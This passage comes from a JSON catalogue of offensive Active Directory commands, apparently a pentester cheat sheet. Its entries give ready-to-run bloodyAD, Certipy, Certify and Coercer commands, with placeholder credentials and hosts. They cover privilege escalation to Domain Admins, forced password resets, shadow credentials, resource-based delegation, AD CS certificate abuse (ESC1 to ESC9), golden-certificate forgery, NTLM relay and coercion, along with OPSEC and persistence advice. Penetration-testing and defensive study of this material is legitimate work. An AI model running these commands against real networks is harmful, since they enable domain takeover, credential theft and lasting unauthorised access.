output.txt\n","mitre":[],"requires":["Shell"],"references":["https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS","https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/README.md","https://book.hacktricks.xyz/windows/windows-local-privilege-escalation"]},{"id":"wadcoms:adidnsdump-Enum","toolId":"wadcoms:adidnsdump","toolName":"adidnsdump","name":"adidnsdump-Enum","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# List available DNS zones\nadidnsdump -u 'test.local\\john' -p password123 --print-zones ldap://10.10.10.1\n# Dump the default zone; -r resolves nodes hidden from the unauthenticated listing (records.csv)\nadidnsdump -u 'test.local\\john' -p password123 -r ldap://10.10.10.1","description":"adidnsdump (dirkjanm) abuses the fact that any authenticated domain user can read the AD-integrated DNS zones (stored in the DomainDnsZones/ForestDnsZones partitions), effectively performing a zone transfer without being a DNS admin. Records whose node name is hidden from the anonymous listing are still enumerable and can be resolved by adding -r, which issues a live DNS query for each hidden node. This maps internal hostnames to IPs for target selection; results are written to records.csv. Use --print-zones first to see which zones exist.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1","mitre":["T1590.002"],"requires":["Username","Password"],"services":["DNS","LDAP"],"references":["https://github.com/dirkjanm/adidnsdump","https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/","https://attack.mitre.org/techniques/T1590/002/"],"added":true},{"id":"wadcoms:bloodyAD-AddComputer","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddComputer","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Create a computer account (returns the new SAM account name and password)\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add computer EVILPC 'Password123!'","description":"bloodyAD's `add computer` action creates a new machine account in the domain over LDAP. Any authenticated user can create up to ms-DS-MachineAccountQuota (default 10) computer accounts, so this is a reliable way to obtain an attacker-controlled principal for RBCD, shadow-credential, or S4U abuse chains. The created computer account has a known password you control. Check the MachineAccountQuota before use; a value of 0 blocks this.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:bloodyAD-AddGenericAll","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddGenericAll","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Persistence","Execution"],"nativeCategory":["PrivEsc","Persistence","Exploitation"],"command":"# Grant john GenericAll over the victim object\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add genericAll victim john","description":"bloodyAD's `add genericAll` action writes a new ACE granting a trustee full control (GenericAll) over a target object's DACL via LDAP. Use it to escalate a lesser right (WriteDacl / WriteOwner) into full control over a user, group, or computer, or to establish a durable ACL backdoor for persistence. Once you hold GenericAll you can reset passwords, set shadow credentials, or configure RBCD on the target.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget object: victim\n\n\tGranted principal: john","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:bloodyAD-AddGroupMember","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddGroupMember","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Add yourself (john) to a group you can write to\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add groupMember 'Domain Admins' john","description":"bloodyAD's `add groupMember` action writes the `member` attribute of a group over LDAP, adding an arbitrary principal (typically yourself) to it. Use it when BloodHound shows you hold GenericAll, GenericWrite, WriteOwner, or Self/AddMember over a privileged group such as an admin or Remote Management group. Adding your account to a high-value group is a direct privilege-escalation primitive; remove yourself afterward to reduce footprint.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget group: Domain Admins","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/addmember","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:bloodyAD-AddRBCD","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddRBCD","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Lateral Movement","Execution"],"nativeCategory":["PrivEsc","Lateral Movement","Exploitation"],"command":"# Allow EVILPC$ to act on behalf of others against DC01$\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add rbcd 'DC01$' 'EVILPC$'","description":"bloodyAD's `add rbcd` action writes the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of a target computer over LDAP, configuring Resource-Based Constrained Delegation so that a controlled service account may impersonate any user to that machine. Combine with an attacker-controlled computer account (see bloodyAD add computer) and Impacket getST -impersonate to obtain a service ticket as a local admin. Requires GenericWrite / GenericAll / WriteProperty over the target computer object.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget computer: DC01$\n\n\tControlled service: EVILPC$","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"],"added":true},{"id":"wadcoms:bloodyAD-DontReqPreauth","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-DontReqPreauth","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Execution"],"nativeCategory":["Credential Access","Exploitation"],"command":"# Enable targeted AS-REP roasting on the victim\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add uac victim -f DONT_REQ_PREAUTH","description":"bloodyAD's `add uac` action with the `-f DONT_REQ_PREAUTH` flag sets the DONT_REQ_PREAUTH bit in a target user's userAccountControl over LDAP, disabling Kerberos pre-authentication. This is a targeted AS-REP roasting primitive: once the flag is set you can request an AS-REP for the account and crack it offline. Requires GenericWrite / write access to the target's userAccountControl; remove the flag afterward to clean up.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim user: victim","mitre":[],"requires":["Username","Password"],"services":["LDAP","Kerberos"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast"],"added":true},{"id":"wadcoms:bloodyAD-SetOwner","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-SetOwner","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Persistence"],"nativeCategory":["PrivEsc","Exploitation","Persistence"],"command":"# Take ownership of the victim object, then grant yourself full control\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' set owner victim john\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add genericAll victim john","description":"bloodyAD's `set owner` action rewrites the owner field in a target object's security descriptor over LDAP. The object owner has implicit WriteDacl, so seizing ownership of a user, group, or computer lets you subsequently grant yourself GenericAll (see bloodyAD add genericAll) and fully control it. Use it when BloodHound reports WriteOwner over a principal. Pair it with a follow-up DACL write to complete the takeover.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget object: victim\n\n\tNew owner: john","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:bloodyAD-SetPassword","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-SetPassword","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Force-reset the password of a user you have write rights over\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' set password victim 'NewPassword123!'","description":"bloodyAD's `set password` action performs a targeted password reset on a user or computer object over LDAP(S). It is the exploitation step when you hold GenericAll, User-Force-Change-Password, or WriteAll over a victim principal discovered in BloodHound. Resetting a service account or privileged user password grants immediate takeover, at the cost of locking out the legitimate user, so it is loud. Requires LDAPS (or LDAP with channel binding) on modern DCs for the password write.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim user: victim","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:bloodyAD-ShadowCredentials","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-ShadowCredentials","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Persistence","Credential Access"],"nativeCategory":["PrivEsc","Persistence","Credential Access"],"command":"# Add a shadow credential (KeyCredentialLink) to the victim\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add shadowCredentials 'DC01$'","description":"bloodyAD's `add shadowCredentials` action appends an attacker-generated key credential to the target's `msDS-KeyCredentialLink` attribute (the Shadow Credentials / Key Trust technique). Requiring only GenericWrite over the victim and an ADCS-enabled PKINIT-capable environment, it lets you authenticate as the target via a certificate and recover its NT hash without changing the account's password, making it far stealthier than a password reset. bloodyAD prints the PFX and follow-up PKINIT command.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim account: DC01$","mitre":[],"requires":["Username","Password"],"services":["LDAP","ADCS"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"added":true},{"id":"wadcoms:Certify-ESC1","toolId":"wadcoms:Certify","toolName":"Certify","name":"Certify-ESC1","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"Certify.exe request /ca:dc.test.local\\test-CA /template:ESC1 /altname:administrator","description":"Certify is the Windows/.NET GhostPack tool for enumerating and abusing AD CS from an existing foothold. Its request verb enrolls in a vulnerable template and, for ESC1, uses /altname to set an arbitrary Subject Alternative Name (e.g. Administrator) on the issued certificate. The output PEM is converted to .pfx with openssl and then passed to Rubeus asktgt /certificate for PKINIT. Use this when you already have a Windows beacon and want to stay on-host rather than pivoting to a Linux attacker box with Certipy.\n\nCommand Reference:\n\n\tCA config: dc.test.local\\test-CA\n\n\tTemplate: ESC1\n\n\tImpersonated user: Administrator","mitre":[],"requires":["Shell"],"services":["ADCS"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-Account-Create","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Account-Create","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"certipy account create -u john@test.local -p password123 -dc-ip 10.10.10.1 -user 'WEBSRV01$' -pass 'ComputerPass123!' -dns websrv01.test.local","description":"Certipy account create adds a new computer (or user) object over LDAP when the operator has MachineAccountQuota available or delegated create rights. This is useful for staging RBCD, Shadow Credentials, or ESC-chain victim accounts that the operator fully controls. The subcommand also supports read/update/delete to modify existing objects' attributes (UPN, SPN, DNS hostname). Runs over LDAP, so add -k / -dc-host for Kerberos-only environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNew account: WEBSRV01$\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://www.thehacker.recipes/ad/movement/adcs"],"added":true},{"id":"wadcoms:Certipy-Auth-PKINIT","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Auth-PKINIT","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"certipy auth -pfx administrator.pfx -username administrator -domain test.local -dc-ip 10.10.10.1","description":"Certipy auth consumes a certificate/private key pair (.pfx) and performs Kerberos PKINIT pre-authentication to request a TGT for the identity in the certificate. It then uses the U2U/UnPAC-the-hash technique to recover the account's NT hash from the PAC, saving a .ccache and printing the hash. This is the final step of most ADCS escalation chains (ESC1/ESC3/ESC6/shadow creds): turn the issued certificate into a usable TGT and an NT hash for pass-the-hash.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tPFX file: administrator.pfx\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["PFX"],"services":["Kerberos","ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/kerberos/pkinit"],"added":true},{"id":"wadcoms:Certipy-ESC1","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC1","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"certipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'ESC1' -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500","description":"ESC1 abuses a certificate template that allows an enrollee to supply an arbitrary Subject Alternative Name (ENROLLEE_SUPPLIES_SUBJECT) and enables Client Authentication EKU, while granting enrollment rights to low-privileged users. Certipy req enrolls against the vulnerable template and sets -upn to Administrator, producing a .pfx that authenticates as the domain admin. Supply -sid with the target's objectSid so the request also survives the 2022 strong certificate mapping (KB5014754) enforcement. Follow up with certipy auth to obtain a TGT and NT hash.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":[],"requires":["Username","Password"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC3","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC3","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# 1) Obtain an enrollment agent certificate\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'EnrollmentAgent'\n\n# 2) Request a cert on behalf of the Administrator using the agent pfx\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'User' -pfx john.pfx -on-behalf-of 'TEST\\Administrator'","description":"ESC3 abuses a template that grants the Certificate Request Agent (Enrollment Agent) EKU. Certipy first enrolls in the enrollment-agent template to obtain an agent .pfx, then makes a second request against a normal client-auth template (e.g. User) with -on-behalf-of set to a privileged account and -pfx pointing at the agent certificate. The resulting certificate authenticates as the impersonated user. Requires enrollment rights on both the agent template and the target template.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local","mitre":[],"requires":["Username","Password"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC4","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC4","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Back up the template config, then overwrite it with a default vulnerable (ESC1-like) configuration\ncertipy template -u john@test.local -p password123 -dc-ip 10.10.10.1 -template 'ESC4' -save-old\n\n# Now abuse it exactly like ESC1 (see Certipy-ESC1), then restore the original config afterwards:\n# certipy template -u john@test.local -p password123 -dc-ip 10.10.10.1 -template 'ESC4' -configuration ESC4.json","description":"ESC4 is a certificate template ACL misconfiguration: the operator has Write/WriteDacl/WriteOwner over a template object. Certipy template with -write-default-configuration overwrites the template's settings with a known ESC1-vulnerable configuration (enrollee-supplied SAN, client-auth EKU, low-priv enrollment), turning any template into an ESC1 path. Use -save-old first to snapshot the original config, exploit ESC1, then restore with -write-configuration <file>.json to reduce footprint. OPSEC: the template change is domain-wide and logged in the config partition.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["ADCS","LDAP"],"references":["https://github.com/ly4k/Certipy","https://www.thehacker.recipes/ad/movement/adcs/access-controls","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC6","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC6","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"certipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'User' -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500","description":"ESC6 occurs when the Enterprise CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set, which lets any requester embed an arbitrary SAN into a certificate regardless of the template's subject settings. Certipy req can therefore enroll in a standard client-auth template (e.g. User) while supplying -upn Administrator to impersonate a privileged account. Include -sid to satisfy strong certificate mapping. Note that post-May-2022 patched DCs ignore the SAN unless the mapping is present, so ESC6 alone is often mitigated on updated environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":[],"requires":["Username","Password"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC7-ManageCA","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC7-ManageCA","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Grant our user the officer right on the CA\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -add-officer john\n\n# Enable the SubCA template so we can request against it\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -enable-template 'SubCA'\n\n# Request (goes pending), then issue and retrieve as an officer\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'SubCA' -upn administrator@test.local\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -issue-request 785\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -retrieve 785","description":"ESC7 is when a principal holds the ManageCA (or ManageCertificates) right on the Enterprise CA. Certipy ca -add-officer promotes the controlled user to a certificate officer, which lets it approve pending requests. Combined with enabling the built-in SubCA template (-enable-template SubCA), the operator can request a cert that goes pending, then issue it (-issue-request) and retrieve it (-retrieve) as any UPN. This turns CA administrative rights into domain-admin certificate issuance.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local","mitre":[],"requires":["Username","Password"],"services":["ADCS","RPC"],"references":["https://github.com/ly4k/Certipy","https://www.thehacker.recipes/ad/movement/adcs/access-controls","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC8-Relay","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC8-Relay","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Credential Access","Execution"],"nativeCategory":["PrivEsc","Credential Access","Exploitation"],"command":"# Start the ADCS HTTP relay targeting the CA web enrollment endpoint\ncertipy relay -target 'http://10.10.10.1' -template 'DomainController'\n\n# In another shell, coerce the DC to authenticate to the listener (10.10.10.2), e.g.\n# coercer coerce -u john -p password123 -d test.local -t 10.10.10.1 -l 10.10.10.2","description":"ESC8 abuses the AD CS web enrollment interface (certsrv / certfnsh.asp), which accepts NTLM authentication and is not protected by channel binding or EPA by default. Certipy relay stands up an HTTP-to-ADCS relay server; once a privileged machine account (e.g. a domain controller) is coerced into authenticating (PetitPotam/Coercer), the relay requests a certificate from the DomainController template on its behalf. The resulting .pfx authenticates as the coerced machine. Certipy relay is the modern replacement for ntlmrelayx.py -t http://<ca>/certsrv/certfnsh.asp --adcs.\n\nCommand Reference:\n\n\tCA / web enrollment host IP: 10.10.10.1\n\n\tAttacker/Listener IP: 10.10.10.2","mitre":[],"requires":["No_Creds"],"services":["ADCS","NTLM"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC9-NoSecurityExtension","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC9-NoSecurityExtension","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Point the controlled victim's UPN at the target admin (no @domain, so it maps by name)\ncertipy account update -u john@test.local -p password123 -dc-ip 10.10.10.1 -user victim -upn administrator\n\n# Enroll/authenticate as victim (now mapping to administrator), then restore:\n# certipy account update -u john@test.local -p password123 -dc-ip 10.10.10.1 -user victim -upn victim@test.local","description":"ESC9/ESC10 abuse weak certificate mapping. When a template has CT_FLAG_NO_SECURITY_EXTENSION (ESC9) or the DC uses weak UPN/SPN mapping (ESC10), an attacker with write access over a victim account can change its userPrincipalName to a target admin's value, enroll a certificate as the victim, then authenticate as the admin because the cert has no SID binding. Certipy account update rewrites the victim's -upn over LDAP; revert it afterwards. This chains with certipy shadow (to enroll as the victim) and certipy auth.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim account: victim\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","ADCS"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-Find-Vulnerable","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Find-Vulnerable","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"certipy find -u john@test.local -p password123 -dc-ip 10.10.10.1 -vulnerable -stdout","description":"Certipy's find command enumerates the AD Certificate Services environment over LDAP and RPC, collecting Enterprise CAs, published certificate templates, and their security descriptors. The -vulnerable flag filters the output to only templates and CA settings that match a known ESC misconfiguration (ESC1-ESC16), and -stdout prints a readable report to the console instead of writing BloodHound/JSON/text files. Run this first with any domain foothold to map which escalation path is available before requesting a certificate.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["ADCS","LDAP"],"references":["https://github.com/ly4k/Certipy","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation","https://www.thehacker.recipes/ad/movement/adcs/certificate-templates"],"added":true},{"id":"wadcoms:Certipy-Forge-GoldenCert","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Forge-GoldenCert","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"certipy forge -ca-pfx test-CA.pfx -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500 -out administrator_forged.pfx","description":"A 'golden certificate' is forged offline once the operator has extracted the Enterprise CA's own certificate and private key (via certipy ca -backup or ESC7, output as a .pfx). Certipy forge signs a brand-new certificate for any UPN with that CA key, so it is trusted by every DC in the forest. Because it never touches the CA and needs no enrollment, it is a durable persistence primitive that survives the target user's password resets. Include -sid to satisfy strong certificate mapping. Feed the forged .pfx to certipy auth.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tCA private key (PFX): test-CA.pfx\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":[],"requires":["PFX"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ShadowCredentials","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ShadowCredentials","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Privilege Escalation"],"nativeCategory":["Credential Access","PrivEsc"],"command":"certipy shadow auto -u john@test.local -p password123 -dc-ip 10.10.10.1 -account victim","description":"Shadow Credentials abuse write access to a target's msDS-KeyCredentialLink attribute (Key Trust). Certipy shadow auto adds an attacker-controlled key credential to the target account over LDAP, uses it to obtain a certificate via PKINIT, recovers the account's NT hash, and then removes the key credential to clean up automatically. Requires GenericWrite/GenericAll (or equivalent) over the target and a KDC that supports PKINIT. Preferred over PyWhisker when you want the full add-authenticate-restore chain in one step.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget account: victim\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","Kerberos","ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"added":true},{"id":"wadcoms:Coercer-Coerce","toolId":"wadcoms:Coercer","toolName":"Coercer","name":"Coercer-Coerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Coercer coerce -u john -p password123 -d test.local -t 10.10.10.1 -l 10.10.10.2","description":"Coercer is a multi-protocol authentication coercion tool that automatically walks through every known RPC coercion method (MS-RPRN, MS-EFSR, MS-DFSNM, MS-FSRVP, MS-EVEN and more) against a target and triggers the machine account to authenticate back to an attacker-controlled listener. The 'coerce' mode fires all applicable methods, making it the fastest way to obtain a machine-account NTLM authentication to feed into ntlmrelayx or krbrelayx. Requires a valid domain account by default and works well when you do not yet know which specific coercion vector (PrinterBug, PetitPotam, DFSCoerce, ShadowCoerce) is exposed. OPSEC: it is noisy, hitting many named pipes in one run.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/p0dalirius/Coercer","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/"],"added":true},{"id":"wadcoms:Coercer-Scan","toolId":"wadcoms:Coercer","toolName":"Coercer","name":"Coercer-Scan","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Coercer scan -u 